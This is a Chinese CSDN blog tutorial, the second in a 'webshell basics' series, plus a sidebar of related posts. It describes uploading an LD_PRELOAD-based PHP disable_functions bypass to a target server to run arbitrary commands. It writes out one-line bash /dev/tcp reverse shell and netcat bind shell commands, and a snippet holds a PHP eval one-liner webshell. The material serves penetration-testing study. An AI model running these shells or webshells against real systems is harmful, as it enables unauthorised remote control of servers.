webshell入门(二)

最新推荐文章于 2024-04-10 20:14:38 发布
最新推荐文章于 2024-04-10 20:14:38 发布
阅读量1.4k 收藏 1
点赞数 1
文章标签: php webshell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/IT_arookie/article/details/109672059
版权

webshell绕安全模式执行命令

  上一次讲了利用java的runtime.exce()方法执行任意代码,但是必然会受到各种杀毒软件的监控,本次学习一个绕过杀毒软件的webshell

  参考网址:https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

在上面网址下载下安装包

在这里插入图片描述
把上图中的php和so文件上传到目标服务器上去,当我们访问该php页面。可以执行任意代码

在这里插入图片描述
根据提示,把参数传入

在这里插入图片描述
如上图:即可执行任意代码

ps:linux一行代码反弹webshell

1、 反向向反弹shell:
靶机: bash -i >& /dev/tcp/192.168.0.128/6666 0>&1
攻击机器: nc -lvp 6666

2、正向向反弹shell:
靶机: nc -lvvp 8888 -e /bin/bash
攻击机器: nc 192.168.0.128 8888

squabLi
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[渗透测试笔记] 17.初步了解webshell 提权
H4ppyD0g的博客
02-09 652
什么是webshell webshell是指在web服务器上的一个脚本程序,通过这个脚本程序可以上传下载文件、查看数据库信息以及调用一些系统命令等。webshell通常是由asp、php、jsp等语言编写,攻击者通过文件上传漏洞将脚本上传到网站作为自己的后门。 webshell原理 本地可以通过远程连接的方式和网站的webshell建立连接,本地发送命令后,网站的shell脚本就会去执行此命令,从...
Cyberchef实战之-Webshell绕过还原揭秘之-base64编码和压缩编码
最新发布
村中少年的专栏
04-29 1169
介绍解析webshell常见的绕过手段,通过解析多层base64,压缩绕过的手段,扫清安全分析人员在日常的网络安全运营,护网,HVV,重保的过程中的障碍
入门-什么是webshell
weixin_30588675的博客
03-27 267
webshell是什么? 顾名思义,"web" - 显然需要服务器开放web服务,"shell" - 取得对服务器某种程度上操作权限。 webshell常常被称为匿名用户(入侵者)通过WEB服务端口对WEB服务器有某种程度上操作的权限,由于其大多是以网页脚本的形式出现,也有人称之为网站后门工具。 2、webshell有什么作用? 一方面,webshell被站长常常用于网...
Web-Shell实战 - Weevely
weixin_40270125的博客
01-04 1230
  今天我们介绍的是一个轻量级的Web-Shell工具 - Weevely。Github地址https://github.com/epinna/weevely3。   PHP backdoor agent 我们将使用Weevely来创建一个php代理后门,然后部署在目标服务器上。 运行weevely.py,就将为我们生成一个名为agent.php的代理后门, 设置访问密码确保只有我们可以...
学习笔记webshell初探
mcc的博客
05-27 698
webshell初探 一.webshelll简介 webshell也就是网页muma,包括大马和小马,小马通过caidao等工具进行连接,大马自带管理界面。现在webshell支持包括php,asp,jsp,perl等语言。 .webshell体验 1.小马总结 一句话 1.<?php @eval($_POST["pass"]); ?> 上面就是最简单的一句话,用于菜刀进...
JavaWeb后门(webshell)基础
st3pby的博客
12-25 1987
最著名的莫过于 PHP 的各种奇思妙想的后门,但与 PHP 不同的是,Java 是强类型语言,语言特性较为严格,不能够像 PHP 那 样利用字符串组合当作系统函数使用,但即便如此,随着安全人员的进一步研究, 依旧出现了很多奇思妙想的 JSP Webshell。Java是一种通用的计算机编程语言,它是并发的,基于类的,面向对象的,并且专门设计为具有尽可能少的实现依赖性。利用这个特性我们可以操作类名,从而达到躲避检测的目的。jsp的后缀可以兼容为jspx的代码,也兼容jspx的所有特性,如CDATA特性。
webshell入门(一)
IT_arookie的博客
11-12 2320
利用java的java.runtime.exec()或java.long.ProcessBuilder()来执行系统命令 1.java.runtime.exec()执行系统命令 package web.shell; import java.io.BufferedReader; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; /** * @Date 2020/11/11
网络安全从入门到精通(特别篇II):Linux安全事件应急响应之webshell处置流程
HACKONE的博客
04-10 45
应急响应Linux应急响应之webshell处置流程 Linux应急响应之webshell处置流程
墨者靶场 入门WebShell文件上传漏洞分析溯源(第1题)
qq_43233085的博客
01-15 1048
墨者靶场 入门WebShell文件上传漏洞分析溯源 第1题题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 某公司内部资料分享平台存在一个文件上传页面,为了保证服务器的安全,现在安全工程师“墨者”将对该上传页面进行安全检测,看是否存在安全漏洞影响服务器的安全性。 实训目标 1、了解PHPPHP5各个版本的相关知识; 2、了解PHP上传绕过扩展名的方法; 3、了解Burpsuite的使用方...
墨者靶场 入门WebShell文件上传漏洞分析溯源(第2题)
qq_43233085的博客
01-16 916
墨者靶场 入门WebShell文件上传漏洞分析溯源(第2题)题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 安全工程师"墨者"在单位办公内网做日常检测时,发现某部门为了方便内部人员上传聚餐的活动图片,在某服务器上新增一简单的图片上传功能。然而这个存在一个很严重的高危漏洞。 实训目标 1、掌握浏览器对JavaScript的禁用方法; 2、掌握表单数据通过POST提交数据时,对数据的修改方法...
webshell反弹工具包
01-25
成套web反弹工具包,包含控制端,被控端。和端口监听工具,配套详细的使用说明
十三课-webshell制作.ppt
02-22
网络攻防相关,欢迎下载。网络攻防相关,欢迎下载。网络攻防相关,欢迎下载。网络攻防相关,欢迎下载。网络攻防相关,欢迎下载。
【攻防世界】web新手练习010 webshell
weixin_43545225的博客
09-12 588
【攻防世界】web新手练习010 webshell 难度系数:2 题目描述: 小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。 题目场景: http://111.200.241.244:63533/ 解题思路 遇见web题目,习惯性F12看一下控制台。 嗯,毫无线索。 题目提示“ webshellwebshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一
后台得到webshell方法大汇总
weixin_33762321的博客
04-25 251
动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站webshell还有一步之遥,但还是有许多新手因想不出合适的方法而被拒之门外。因此,我们把常用的从后台得到we...
webshell相关之——渗透获取webshell思路总结
温柔小薛的博客
04-30 3956
渗透获取webshell思路总结 又坐一天没动地方哈,但是感觉还是有一些没真整明白,也没总结的特别全面细致,今天先发出来,明天再花时间再整理一下,这个问题也是很多面试中常见问题,我认为值得花些时间来研究。 今天就从CMS和非CMS,与有管理权限和无管理权限(无需登录),这几个方面来梳理一下渗透测试获取webshell的思路,并没有很具体的方法实战,现在关于这个思路都是用一个南方内个靶机,网上很多...
WebShell -- Linux反弹
weixin_41489908的博客
03-18 353
​终于明白了,超市那么多饮料,还是会有人买矿泉水,就像现在外面有很多诱惑,但最终还是会选择干净有趣的灵魂吧。。。 ---- 网易云热评 小攻:IP地址:192.168.139.129 Win7 小受:IP地址:192.168.139.128,Ubuntu 一、拿到webshell后,点击反弹提权 、小攻运行nv -vv -l -p 3355 三、在反弹提权页面,输入小攻的地址及上面监听的端口号,点击开始连接 四、小攻已成功连接小受,输入命令函数w...
获取webshell方法与总结
一枚努力的蛋蛋
07-04 1968
CMS获取Webshell方法 通过百度搜索cms网站 非 CMS获取Webshell方法 数据库备份获取webshell 搭建南方数据5.0进入到管理员界面,然后找到数据库备份 文件上传 但是它会检测内容,阻止你上传。 使用edjpgcom.exe把图片数据和一句话结合起来 点击上传 接下来数据库备份 最后用菜刀访问 抓包上传获取webshell sql命令获取Webshell ...
最新最全的WEBSHELL提权方法【1】
weixin_34315189的博客
08-14 208
在得到了一个Webshell之后,如果能进一步利用系统的配置不当取得更高的权限,一直是广大黑友们所津津乐道的话题,也是高手和菜鸟间最大的区别。本 文将从一个大角度总括当前流行的各种提权方法,希望对大家有所启发,起到一个抛砖引玉的作用WEBSHELL权限提升技巧c:d:e:.....C:\DocumentsandSettings \AllUsers\「开始...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值